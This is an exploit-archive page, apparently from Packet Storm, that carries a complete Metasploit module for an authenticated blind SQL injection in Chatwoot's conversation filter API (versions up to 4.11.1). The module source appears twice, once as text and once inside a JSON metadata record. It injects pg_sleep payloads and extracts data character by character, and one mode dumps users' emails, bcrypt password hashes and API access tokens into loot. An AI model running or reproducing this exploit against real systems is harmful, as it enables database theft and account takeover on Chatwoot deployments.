📄 Chatwoot 4.11.1 SQL Injection_PACKETSTORM:223093

8.5 / 10

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N

Description

This Metasploit module targets an authenticated SQL injection vulnerability in the conversation filtering functionality of Chatwoot instances up to version 4.11.1...

Visit Original Source

Basic Information

ID PACKETSTORM:223093

Published Jun 10, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : Chatwoot 4.11.1 FilterService SQL Injection Module for Authenticated Exposure Validation and Database Extraction |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.chatwoot.com |
==================================================================================================================================

[+] Summary : module targets an authenticated SQL injection vulnerability in the conversation filtering functionality of Chatwoot instances up to version 4.11.1.

[+] POC :

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Chatwoot SQL Injection (CVE-CVE-2026-44706) - FilterService#lt_gt_filter',
'Description' => %q{
This module exploits a time-based SQL injection vulnerability in Chatwoot
versions <= 4.11.1. The vulnerability exists in the conversation filter
functionality, allowing an authenticated attacker to execute arbitrary
SQL queries, extract sensitive data, and retrieve user credentials.
},
'Author' => ['indoushka'],
'License' => MSF_LICENSE,
'References' => [
['URL', 'https://hakaisecurity.io'],
['CVE', 'CVE-2026-44706']
],
'DisclosureDate' => '2026-06-09',
'Platform' => 'ruby',
'Arch' => ARCH_CMD,
'Targets' => [['Automatic', {}]],
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)

register_options([
OptString.new('TARGETURI', [true, 'Base path for Chatwoot', '/']),
OptString.new('API_TOKEN', [true, 'Chatwoot API access token', '']),
OptInt.new('ACCOUNT_ID', [true, 'Target account ID', 1]),
OptEnum.new('ACTION', [true, 'Action to perform', 'check', ['check', 'timebased', 'extract', 'creds']]),
OptString.new('SQL_QUERY', [false, 'SQL query for extract mode', 'SELECT version()']),
OptInt.new('MAX_LEN', [false, 'Maximum string length for extraction', 200]),
OptInt.new('SLEEP_TIME', [false, 'Time in seconds for sleep-based injection', 2]),
OptFloat.new('THRESHOLD', [false, 'Time threshold for detecting sleep (seconds)', 1.5])
])
end

def sleep_time
datastore['SLEEP_TIME']
end

def threshold
datastore['THRESHOLD']
end

def build_payload(injected_sql)
value = "2024-01-01'::date #{injected_sql} 'epoch'::date > '2024-01-01"
{
'payload' => [
{
'attribute_key' => 'created_at',
'filter_operator' => 'is_greater_than',
'values' => [value],
'query_operator' => nil
}
]
}
end

def send_filter_request(payload, timeout = 60)
uri = normalize_uri(target_uri.path, "/api/v1/accounts/#{datastore['ACCOUNT_ID']}/conversations/filter")

res = send_request_cgi(
'method' => 'POST',
'uri' => uri,
'ctype' => 'application/json',
'headers' => {
'api_access_token' => datastore['API_TOKEN']
},
'data' => payload.to_json,
'timeout' => timeout
)

res
rescue ::Rex::ConnectionError, ::Rex::TimeoutError => e
print_error("Request failed: #{e.message}")
nil
end

def blind_check(condition)
sqli = "AND (SELECT CASE WHEN (#{condition}) THEN pg_sleep(#{sleep_time}) ELSE pg_sleep(0) END)::text != 'x' OR"
payload = build_payload(sqli)

start_time = Time.now
send_filter_request(payload, sleep_time + 30)
elapsed = Time.now - start_time

elapsed >= threshold
end

def extract_int(expression, low = 0, high = 10000)
while low <= high
mid = (low + high) / 2

if blind_check("(#{expression}) = #{mid}")
return mid
elsif blind_check("(#{expression}) > #{mid}")
low = mid + 1
else
high = mid - 1
end
end
nil
end

def extract_string(expression, max_len = 200, charset = nil)
charset ||= (('a'..'z').to_a + ('A'..'Z').to_a + ('0'..'9').to_a +
['@', '.', '_', '-', ':', '$', '/', ' ', '!', '#', '%', '^', '&', '*',
'(', ')', '+', '=', '[', ']', '{', '}', '|', ';', "'", ',', '<', '>',
'?', '~', '`', '"', '\\'])

length = extract_int("length((#{expression})::text)", 0, max_len)
return '' unless length

print_status("Extracting #{length} characters...")

result = ''
(1..length).each do |pos|
found = false
charset.each do |ch|
esc = ch.gsub("'", "''")
condition = "substring((#{expression})::text,#{pos},1) = '#{esc}'"

if blind_check(condition)
result << ch
print(ch)
found = true
break
end
end

result << '?' unless found
print('?') unless found
end

print_line
result
end

def check_vulnerability
print_status("Checking vulnerability with OR TRUE bypass...")
normal_payload = {
'payload' => [
{
'attribute_key' => 'created_at',
'filter_operator' => 'is_greater_than',
'values' => ['2099-01-01'],
'query_operator' => nil
}
]
}

normal_res = send_filter_request(normal_payload)
return false unless normal_res&.code == 200
normal_count = JSON.parse(normal_res.body).dig('meta', 'all_count') || 0
malicious_res = send_filter_request(build_payload('OR TRUE OR'))
return false unless malicious_res&.code == 200
malicious_count = JSON.parse(malicious_res.body).dig('meta', 'all_count') || 0

print_status("Normal count: #{normal_count} | Malicious count: #{malicious_count}")

if malicious_count > normal_count
print_good("SQL injection confirmed!")
return true
else
print_error("Inconclusive - target may not be vulnerable")
return false
end
end

def timebased_test
print_status("Testing time-based injection...")
start_time = Time.now
send_filter_request(build_payload("AND (SELECT pg_sleep(0))::text != 'x' OR"))
base_time = Time.now - start_time
print_status("Baseline time: #{'%.2f' % base_time}s")
start_time = Time.now
send_filter_request(build_payload("AND (SELECT pg_sleep(3))::text != 'x' OR"))
sleep_time_actual = Time.now - start_time
print_status("Sleep(3) time: #{'%.2f' % sleep_time_actual}s")

delta = sleep_time_actual - base_time
print_status("Delta: #{'%.2f' % delta}s")

if delta >= 2.5
print_good("Time-based injection confirmed!")
else
print_error("Time-based injection may not be exploitable")
end
end

def extract_data
query = datastore['SQL_QUERY']
max_len = datastore['MAX_LEN']

print_status("Extracting: #{query}")
result = extract_string(query, max_len)

if result.present?
print_good("Result: #{result}")
store_loot('chatwoot_sql_extract', 'text/plain', rhost, result, 'sql_extract.txt', "Extracted SQL query result")
else
print_error("Extraction failed")
end
end

def extract_credentials
print_status("Extracting user credentials...")
print_status("Counting users...")
user_count = extract_int("SELECT count(*) FROM users", 0, 100)

unless user_count && user_count > 0
print_error("Could not determine user count")
return
end

print_good("Found #{user_count} user(s)")

creds = []
hc_charset = ('a'..'z').to_a + ('0'..'9').to_a + ['$', '2', 'a', 'b', '1', '0', '.', '/'] + ('A'..'Z').to_a
ec_charset = ('a'..'z').to_a + ('0'..'9').to_a + ['@', '.', '_', '-', '+'] + ('A'..'Z').to_a

(0...user_count).each do |i|
print_status("Processing user #{i + 1}/#{user_count}")

uid = extract_int("SELECT id FROM users ORDER BY id LIMIT 1 OFFSET #{i}", 1, 100000)
next unless uid

print_status(" ID: #{uid}")

email = extract_string("SELECT email FROM users WHERE id=#{uid}", 100, ec_charset)
password_hash = extract_string("SELECT encrypted_password FROM users WHERE id=#{uid}", 60, hc_charset)
token = extract_string("SELECT token FROM access_tokens WHERE owner_type='User' AND owner_id=#{uid} LIMIT 1", 30)

creds << {
id: uid,
email: email,
hash: password_hash,
token: token
}

print_good(" Email: #{email}") if email.present?
print_good(" Hash: #{password_hash}") if password_hash.present?
print_good(" Token: #{token}") if token.present?
end
creds.each do |cred|
report_cred(
user: cred[:email],
hash: cred[:hash],
private_type: :nonreplayable_hash,
private_data: cred[:hash],
jtr_format: 'bcrypt'
) if cred[:hash].present?

report_cred(
user: cred[:email],
private_type: :password,
private_data: cred[:token]
) if cred[:token].present?
end
loot_data = JSON.pretty_generate(creds)
store_loot('chatwoot_credentials', 'application/json', rhost, loot_data, 'chatwoot_creds.json', 'Extracted credentials')
print_good("Credentials saved to loot")
end

def report_cred(opts = {})
return unless opts[:user].present? && opts[:private_data].present?

credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:private_data],
private_type: opts[:private_type] || :password,
workspace_id: myworkspace.id,
address: rhost,
port: rport,
service_name: 'chatwoot',
protocol: 'tcp'
}
create_credential(credential_data)
rescue => e
print_error("Failed to report credential: #{e.message}")
end

def run
unless datastore['API_TOKEN'].present?
print_error("API_TOKEN is required")
return
end
print_status("Verifying authentication...")
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/api/v1/profile'),
'headers' => { 'api_access_token' => datastore['API_TOKEN'] }
)

unless res && res.code == 200
print_error("Authentication failed - invalid token or URL")
return
end
begin
profile = JSON.parse(res.body)
print_good("Authenticated as: #{profile['name']} (#{profile['email']}) - Account ID: #{datastore['ACCOUNT_ID']}")
rescue
print_status("Authentication successful")
end
case datastore['ACTION']
when 'check'
check_vulnerability
when 'timebased'
timebased_test
when 'extract'
extract_data
when 'creds'
extract_credentials
end
end
end

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

{
    "lastseen": "2026-06-10T15:33:37",
    "description": "This Metasploit module targets an authenticated SQL injection vulnerability in the conversation filtering functionality of Chatwoot instances up to version 4.11.1...",
    "published": "2026-06-10T00:00:00",
    "modified": "2026-06-10T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Chatwoot 4.11.1 SQL Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:223093",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-44706"
    ],
    "sourceData": "==================================================================================================================================\n    | # Title     : Chatwoot 4.11.1 FilterService SQL Injection Module for Authenticated Exposure Validation and Database Extraction |\n    | # Author    : indoushka                                                                                                        |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\n    | # Vendor    : https://www.chatwoot.com                                                                                         |\n    ==================================================================================================================================\n    \n    [+] Summary    :  module targets an authenticated SQL injection vulnerability in the conversation filtering functionality of Chatwoot instances up to version 4.11.1.\n    \n    \n    [+] POC        :  \n    \n    ##\n    # This module requires Metasploit: https://metasploit.com/download\n    # Current source: https://github.com/rapid7/metasploit-framework\n    ##\n    \n    class MetasploitModule < Msf::Auxiliary\n      include Msf::Exploit::Remote::HttpClient\n      include Msf::Auxiliary::Report\n    \n      def initialize(info = {})\n        super(\n          update_info(\n            info,\n            'Name' => 'Chatwoot SQL Injection (CVE-CVE-2026-44706) - FilterService#lt_gt_filter',\n            'Description' => %q{\n              This module exploits a time-based SQL injection vulnerability in Chatwoot\n              versions <= 4.11.1. The vulnerability exists in the conversation filter\n              functionality, allowing an authenticated attacker to execute arbitrary\n              SQL queries, extract sensitive data, and retrieve user credentials.\n            },\n            'Author' => ['indoushka'],\n            'License' => MSF_LICENSE,\n            'References' => [\n              ['URL', 'https://hakaisecurity.io'],\n              ['CVE', 'CVE-2026-44706'] \n            ],\n            'DisclosureDate' => '2026-06-09',\n            'Platform' => 'ruby',\n            'Arch' => ARCH_CMD,\n            'Targets' => [['Automatic', {}]],\n            'DefaultTarget' => 0,\n            'Notes' => {\n              'Stability' => [CRASH_SAFE],\n              'Reliability' => [REPEATABLE_SESSION],\n              'SideEffects' => [IOC_IN_LOGS]\n            }\n          )\n        )\n    \n        register_options([\n          OptString.new('TARGETURI', [true, 'Base path for Chatwoot', '/']),\n          OptString.new('API_TOKEN', [true, 'Chatwoot API access token', '']),\n          OptInt.new('ACCOUNT_ID', [true, 'Target account ID', 1]),\n          OptEnum.new('ACTION', [true, 'Action to perform', 'check', ['check', 'timebased', 'extract', 'creds']]),\n          OptString.new('SQL_QUERY', [false, 'SQL query for extract mode', 'SELECT version()']),\n          OptInt.new('MAX_LEN', [false, 'Maximum string length for extraction', 200]),\n          OptInt.new('SLEEP_TIME', [false, 'Time in seconds for sleep-based injection', 2]),\n          OptFloat.new('THRESHOLD', [false, 'Time threshold for detecting sleep (seconds)', 1.5])\n        ])\n      end\n    \n      def sleep_time\n        datastore['SLEEP_TIME']\n      end\n    \n      def threshold\n        datastore['THRESHOLD']\n      end\n    \n      def build_payload(injected_sql)\n        value = \"2024-01-01'::date #{injected_sql} 'epoch'::date > '2024-01-01\"\n        {\n          'payload' => [\n            {\n              'attribute_key' => 'created_at',\n              'filter_operator' => 'is_greater_than',\n              'values' => [value],\n              'query_operator' => nil\n            }\n          ]\n        }\n      end\n    \n      def send_filter_request(payload, timeout = 60)\n        uri = normalize_uri(target_uri.path, \"/api/v1/accounts/#{datastore['ACCOUNT_ID']}/conversations/filter\")\n        \n        res = send_request_cgi(\n          'method' => 'POST',\n          'uri' => uri,\n          'ctype' => 'application/json',\n          'headers' => {\n            'api_access_token' => datastore['API_TOKEN']\n          },\n          'data' => payload.to_json,\n          'timeout' => timeout\n        )\n        \n        res\n      rescue ::Rex::ConnectionError, ::Rex::TimeoutError => e\n        print_error(\"Request failed: #{e.message}\")\n        nil\n      end\n    \n      def blind_check(condition)\n        sqli = \"AND (SELECT CASE WHEN (#{condition}) THEN pg_sleep(#{sleep_time}) ELSE pg_sleep(0) END)::text != 'x' OR\"\n        payload = build_payload(sqli)\n        \n        start_time = Time.now\n        send_filter_request(payload, sleep_time + 30)\n        elapsed = Time.now - start_time\n        \n        elapsed >= threshold\n      end\n    \n      def extract_int(expression, low = 0, high = 10000)\n        while low <= high\n          mid = (low + high) / 2\n          \n          if blind_check(\"(#{expression}) = #{mid}\")\n            return mid\n          elsif blind_check(\"(#{expression}) > #{mid}\")\n            low = mid + 1\n          else\n            high = mid - 1\n          end\n        end\n        nil\n      end\n    \n      def extract_string(expression, max_len = 200, charset = nil)\n        charset ||= (('a'..'z').to_a + ('A'..'Z').to_a + ('0'..'9').to_a + \n                     ['@', '.', '_', '-', ':', '$', '/', ' ', '!', '#', '%', '^', '&', '*',\n                      '(', ')', '+', '=', '[', ']', '{', '}', '|', ';', \"'\", ',', '<', '>',\n                      '?', '~', '`', '\"', '\\\\'])\n        \n        length = extract_int(\"length((#{expression})::text)\", 0, max_len)\n        return '' unless length\n        \n        print_status(\"Extracting #{length} characters...\")\n        \n        result = ''\n        (1..length).each do |pos|\n          found = false\n          charset.each do |ch|\n            esc = ch.gsub(\"'\", \"''\")\n            condition = \"substring((#{expression})::text,#{pos},1) = '#{esc}'\"\n            \n            if blind_check(condition)\n              result << ch\n              print(ch)\n              found = true\n              break\n            end\n          end\n          \n          result << '?' unless found\n          print('?') unless found\n        end\n        \n        print_line\n        result\n      end\n    \n      def check_vulnerability\n        print_status(\"Checking vulnerability with OR TRUE bypass...\")\n        normal_payload = {\n          'payload' => [\n            {\n              'attribute_key' => 'created_at',\n              'filter_operator' => 'is_greater_than',\n              'values' => ['2099-01-01'],\n              'query_operator' => nil\n            }\n          ]\n        }\n        \n        normal_res = send_filter_request(normal_payload)\n        return false unless normal_res&.code == 200\n        normal_count = JSON.parse(normal_res.body).dig('meta', 'all_count') || 0\n        malicious_res = send_filter_request(build_payload('OR TRUE OR'))\n        return false unless malicious_res&.code == 200\n        malicious_count = JSON.parse(malicious_res.body).dig('meta', 'all_count') || 0\n        \n        print_status(\"Normal count: #{normal_count} | Malicious count: #{malicious_count}\")\n        \n        if malicious_count > normal_count\n          print_good(\"SQL injection confirmed!\")\n          return true\n        else\n          print_error(\"Inconclusive - target may not be vulnerable\")\n          return false\n        end\n      end\n    \n      def timebased_test\n        print_status(\"Testing time-based injection...\")\n        start_time = Time.now\n        send_filter_request(build_payload(\"AND (SELECT pg_sleep(0))::text != 'x' OR\"))\n        base_time = Time.now - start_time\n        print_status(\"Baseline time: #{'%.2f' % base_time}s\")\n        start_time = Time.now\n        send_filter_request(build_payload(\"AND (SELECT pg_sleep(3))::text != 'x' OR\"))\n        sleep_time_actual = Time.now - start_time\n        print_status(\"Sleep(3) time: #{'%.2f' % sleep_time_actual}s\")\n        \n        delta = sleep_time_actual - base_time\n        print_status(\"Delta: #{'%.2f' % delta}s\")\n        \n        if delta >= 2.5\n          print_good(\"Time-based injection confirmed!\")\n        else\n          print_error(\"Time-based injection may not be exploitable\")\n        end\n      end\n    \n      def extract_data\n        query = datastore['SQL_QUERY']\n        max_len = datastore['MAX_LEN']\n        \n        print_status(\"Extracting: #{query}\")\n        result = extract_string(query, max_len)\n        \n        if result.present?\n          print_good(\"Result: #{result}\")\n          store_loot('chatwoot_sql_extract', 'text/plain', rhost, result, 'sql_extract.txt', \"Extracted SQL query result\")\n        else\n          print_error(\"Extraction failed\")\n        end\n      end\n    \n      def extract_credentials\n        print_status(\"Extracting user credentials...\")\n        print_status(\"Counting users...\")\n        user_count = extract_int(\"SELECT count(*) FROM users\", 0, 100)\n        \n        unless user_count && user_count > 0\n          print_error(\"Could not determine user count\")\n          return\n        end\n        \n        print_good(\"Found #{user_count} user(s)\")\n        \n        creds = []\n        hc_charset = ('a'..'z').to_a + ('0'..'9').to_a + ['$', '2', 'a', 'b', '1', '0', '.', '/'] + ('A'..'Z').to_a\n        ec_charset = ('a'..'z').to_a + ('0'..'9').to_a + ['@', '.', '_', '-', '+'] + ('A'..'Z').to_a\n        \n        (0...user_count).each do |i|\n          print_status(\"Processing user #{i + 1}/#{user_count}\")\n          \n          uid = extract_int(\"SELECT id FROM users ORDER BY id LIMIT 1 OFFSET #{i}\", 1, 100000)\n          next unless uid\n          \n          print_status(\"  ID: #{uid}\")\n          \n          email = extract_string(\"SELECT email FROM users WHERE id=#{uid}\", 100, ec_charset)\n          password_hash = extract_string(\"SELECT encrypted_password FROM users WHERE id=#{uid}\", 60, hc_charset)\n          token = extract_string(\"SELECT token FROM access_tokens WHERE owner_type='User' AND owner_id=#{uid} LIMIT 1\", 30)\n          \n          creds << {\n            id: uid,\n            email: email,\n            hash: password_hash,\n            token: token\n          }\n          \n          print_good(\"  Email: #{email}\") if email.present?\n          print_good(\"  Hash: #{password_hash}\") if password_hash.present?\n          print_good(\"  Token: #{token}\") if token.present?\n        end\n        creds.each do |cred|\n          report_cred(\n            user: cred[:email],\n            hash: cred[:hash],\n            private_type: :nonreplayable_hash,\n            private_data: cred[:hash],\n            jtr_format: 'bcrypt'\n          ) if cred[:hash].present?\n          \n          report_cred(\n            user: cred[:email],\n            private_type: :password,\n            private_data: cred[:token]\n          ) if cred[:token].present?\n        end\n        loot_data = JSON.pretty_generate(creds)\n        store_loot('chatwoot_credentials', 'application/json', rhost, loot_data, 'chatwoot_creds.json', 'Extracted credentials')\n        print_good(\"Credentials saved to loot\")\n      end\n      \n      def report_cred(opts = {})\n        return unless opts[:user].present? && opts[:private_data].present?\n        \n        credential_data = {\n          origin_type: :service,\n          module_fullname: fullname,\n          username: opts[:user],\n          private_data: opts[:private_data],\n          private_type: opts[:private_type] || :password,\n          workspace_id: myworkspace.id,\n          address: rhost,\n          port: rport,\n          service_name: 'chatwoot',\n          protocol: 'tcp'\n        }\n        create_credential(credential_data)\n      rescue => e\n        print_error(\"Failed to report credential: #{e.message}\")\n      end\n    \n      def run\n        unless datastore['API_TOKEN'].present?\n          print_error(\"API_TOKEN is required\")\n          return\n        end\n        print_status(\"Verifying authentication...\")\n        res = send_request_cgi(\n          'method' => 'GET',\n          'uri' => normalize_uri(target_uri.path, '/api/v1/profile'),\n          'headers' => { 'api_access_token' => datastore['API_TOKEN'] }\n        )\n        \n        unless res && res.code == 200\n          print_error(\"Authentication failed - invalid token or URL\")\n          return\n        end\n        begin\n          profile = JSON.parse(res.body)\n          print_good(\"Authenticated as: #{profile['name']} (#{profile['email']}) - Account ID: #{datastore['ACCOUNT_ID']}\")\n        rescue\n          print_status(\"Authentication successful\")\n        end\n        case datastore['ACTION']\n        when 'check'\n          check_vulnerability\n        when 'timebased'\n          timebased_test\n        when 'extract'\n          extract_data\n        when 'creds'\n          extract_credentials\n        end\n      end\n    end\n    \n    Greetings to :==============================================================================\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\n    ============================================================================================",
    "sourceHref": "https://packetstorm.news/download/223093",
    "cvss": {
        "score": 8.5,
        "severity": "HIGH",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/223093/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply